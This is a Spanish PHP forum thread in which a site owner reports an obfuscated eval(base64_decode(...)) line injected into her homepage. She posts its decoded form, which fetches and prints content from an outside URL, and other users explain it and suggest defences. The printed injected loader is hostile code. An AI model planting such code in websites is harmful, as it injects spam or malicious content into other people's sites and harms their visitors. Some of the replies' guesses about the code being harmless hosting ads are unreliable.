Foros del Web » Programando para Internet » PHP »

Ataque eval

Estas en el tema de Ataque eval en el foro de PHP en Foros del Web. Hola chicos, estaba revisando unos archivos de una web de prueba que estoy realizando y ahora en la mañana mire que tenia esto: Código PHP: ...
  #1 (permalink)  
Antiguo 04/11/2009, 10:51
Avatar de JessicaTJ  
Fecha de Ingreso: enero-2007
Ubicación: 127.0.0.1
Mensajes: 472
Antigüedad: 17 años, 10 meses
Puntos: 25
Ataque eval

Hola chicos, estaba revisando unos archivos de una web de prueba que estoy realizando y ahora en la mañana mire que tenia esto:

Código PHP:
<?php 
eval (base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>
Y aparte un monton de URLs que llevaban mayormente a sitios de compras y para adultos, podrian plis ayudarme o decirme, que es eso?

Dentro de mi poco conocimiento que tengo en PHP creo que es un ataque verdad? Como podria evitarlos?

Agradecere su ayuda una vez mas chicos
__________________
٩(͡๏̯͡๏)۶ || ٩(͡๏̯͡๏)۶
  #2 (permalink)  
Antiguo 04/11/2009, 11:05
Avatar de valenti77  
Fecha de Ingreso: julio-2008
Ubicación: Berisso, Buenos Aires
Mensajes: 244
Antigüedad: 16 años, 4 meses
Puntos: 4
Respuesta: Ataque eval

La función eval, permite evaluar el contenido de una variable y si es ejecutable, hacerlo.

La funcion Base64_decode decodifica el codigo que aqui se ve a continuación, que esta en base 64.

Conclusión, es un ataque, y vaya a saber que es lo que hace, ya que esta todo codificado. Todas esas letras, son codigo ejecutable codificado. O tal vez tengas suerte y solamente sea un cartel, o simples palabras.

Un saludo!
  #3 (permalink)  
Antiguo 04/11/2009, 11:07
Avatar de JessicaTJ  
Fecha de Ingreso: enero-2007
Ubicación: 127.0.0.1
Mensajes: 472
Antigüedad: 17 años, 10 meses
Puntos: 25
Respuesta: Ataque eval

Hola valenti77 gracias por tu respuesta.

Decodificado es esto:
Código:
$l="http://tourreviews.asia/links2/link.php"; if (extension_loaded("curl")){ 
$ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);}
else{$r=implode("",file($l));} print @$r;
Y no le entiendo xD

Podrias plis decirme, como podria evitar esto para que no vuelva a suceder?
Desde ya agradezco mucho tu ayuda

Última edición por JessicaTJ; 05/11/2009 a las 09:51
  #4 (permalink)  
Antiguo 04/11/2009, 12:16
Avatar de valenti77  
Fecha de Ingreso: julio-2008
Ubicación: Berisso, Buenos Aires
Mensajes: 244
Antigüedad: 16 años, 4 meses
Puntos: 4
Respuesta: Ataque eval

En este momento no tengo tiempo para revisarlo detalladamente, aguantame un rato que le pego una ojeada y te digo aproximadamente.

Saludos!
  #5 (permalink)  
Antiguo 04/11/2009, 12:27
Avatar de JessicaTJ  
Fecha de Ingreso: enero-2007
Ubicación: 127.0.0.1
Mensajes: 472
Antigüedad: 17 años, 10 meses
Puntos: 25
Respuesta: Ataque eval

Oki, gracias valenti77, entonces te espero
__________________
٩(͡๏̯͡๏)۶ || ٩(͡๏̯͡๏)۶
  #6 (permalink)  
Antiguo 04/11/2009, 13:15
 
Fecha de Ingreso: abril-2008
Mensajes: 435
Antigüedad: 16 años, 6 meses
Puntos: 10
Respuesta: Ataque eval

Hola, el ataque ese seguramente te lleva a esa web y por medio de sockets se lleva una cookie o algo la verdad no estoy muy al tanto de CURL.
Lo primero que deberiamos identificar es como se metio ese codigo en tu pagina, alguna vulnerabilidad del ftp, o alguna otra cosa... donde encontraste el codigo ese?
esta en todas las paginas?

saludos
  #7 (permalink)  
Antiguo 04/11/2009, 18:26
Avatar de valenti77  
Fecha de Ingreso: julio-2008
Ubicación: Berisso, Buenos Aires
Mensajes: 244
Antigüedad: 16 años, 4 meses
Puntos: 4
Respuesta: Ataque eval

Estoy por revisar el codigo, en un momento te digo que obtuve de ahí. Mientras tanto podes investigar lo que dice el amigo Adell.
  #8 (permalink)  
Antiguo 04/11/2009, 18:57
Avatar de valenti77  
Fecha de Ingreso: julio-2008
Ubicación: Berisso, Buenos Aires
Mensajes: 244
Antigüedad: 16 años, 4 meses
Puntos: 4
Respuesta: Ataque eval

El codigo lo que hace primeramente es fijarse si la libreria "cURL", que es una librería creada por un hombre, permite la transferencia de archivos sea cual sea el protocolo o server.

Si la librería existe(extension_loaded), comienza la sesión cURL, settea todas las opciones a su gusto, mediante CURLOPT_laopcion:

CURLOPT_TIMEOUT, 30 (supongo que 30 segundos de ejecucion de la transferencia)
CURLOPT_RETURNTRANSFER, 1 = Trae la URL como string en vez de mostrarla en pantalla (1 se refiere a verdadero, 0 se refiere a falso)
CURLOPT_URL, $l = Acordate que en $l esta guardada la URL de la pagina, por lo tanto la URL a extraer es: http://tourreviews.asia/links2/link.php

Luego la ejecuta con curl_exec, trae esa pagina, y la muestra.

Si no tenes habilitada la libreria cURL, mediante implode y file, lee la misma pagina, y la trae de todas formas.

Estas en un servidor gratuito? Porque no le veo nada malicioso, lo que si no se es lo que hay en link.php. Supongo que debe ser publicidad metida por el mismo hosting, ya que todo esto lo ejecuta mediante la funcion eval(), y podria pensarse que lo que hace es traer un AD o un banner.
Despues esta el pesimismo, que podria traer mas codigo malicioso en vez de banners.
  #9 (permalink)  
Antiguo 04/11/2009, 19:01
Avatar de acoevil  
Fecha de Ingreso: julio-2008
Ubicación: localhost/colombia/sevillaValle.php
Mensajes: 1.123
Antigüedad: 16 años, 3 meses
Puntos: 32
Respuesta: Ataque eval

Ei, sabes de alguna tecnica para evitar este tipo de ataques.
__________________
Como presentar nuestros datos por medio de tablas . clase Aco_DataGrid Version 1.4
  #10 (permalink)  
Antiguo 04/11/2009, 23:23
Avatar de valenti77  
Fecha de Ingreso: julio-2008
Ubicación: Berisso, Buenos Aires
Mensajes: 244
Antigüedad: 16 años, 4 meses
Puntos: 4
Respuesta: Ataque eval

Puedes leerte Este artículo que algo tiene de explicación.

Estos temas de seguridad son demasiado complejos. Es cuestión de probar, prueba y error.
  #11 (permalink)  
Antiguo 05/11/2009, 09:49
Avatar de JessicaTJ  
Fecha de Ingreso: enero-2007
Ubicación: 127.0.0.1
Mensajes: 472
Antigüedad: 17 años, 10 meses
Puntos: 25
Respuesta: Ataque eval

Hola valenti77 y Adell

Muchisimas gracias por sus respuestas y ayuda.

El codigo lo encontre ayer mismo pero solo en la pagina principal, tenia un monton de links de publicidad que se imprimian en pantalla y tenia la funcion eval.

Ayer lo removi e hice implementaciones de proteccion contra inyecciones SQL.

Espero que con eso y el favor de Dios ya no suceda nada de nuevo. Investigare mas para ver el porke podria haber sucedido.

Mil gracias de nuevo chicos
__________________
٩(͡๏̯͡๏)۶ || ٩(͡๏̯͡๏)۶
  #12 (permalink)  
Antiguo 05/11/2009, 12:06
Avatar de valenti77  
Fecha de Ingreso: julio-2008
Ubicación: Berisso, Buenos Aires
Mensajes: 244
Antigüedad: 16 años, 4 meses
Puntos: 4
Respuesta: Ataque eval

De nada, lo único que ahora Google me marca este tema como "una web atacante", al igual que tu perfil cuando quize mandarte un mensaje comentando esto. Cuando lo vi no lo podía creer.

Tambien podés probar desactivando la librería cURL, si no la vas a utilizar. Aunque eso implica que esté desactivada para todos los usuarios del hosting jaja, si el hosting es tuyo, lo podrias hacer.
Lo mas probable es que quieran usar tu server de zombie, para bajar un servidor mas grande.

Saludos!
  #13 (permalink)  
Antiguo 06/11/2009, 12:31
Avatar de JessicaTJ  
Fecha de Ingreso: enero-2007
Ubicación: 127.0.0.1
Mensajes: 472
Antigüedad: 17 años, 10 meses
Puntos: 25
Respuesta: Ataque eval

Hola valenti77, sip, parece que los errores son en todo el foro, esta super raro eso.

El servidor es de paga pero compartido, acabo de implementar sistemas de seguridad para tratar de evitar que esto vuelva a suceder.

Mil gracias valenti77
__________________
٩(͡๏̯͡๏)۶ || ٩(͡๏̯͡๏)۶
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 22:39.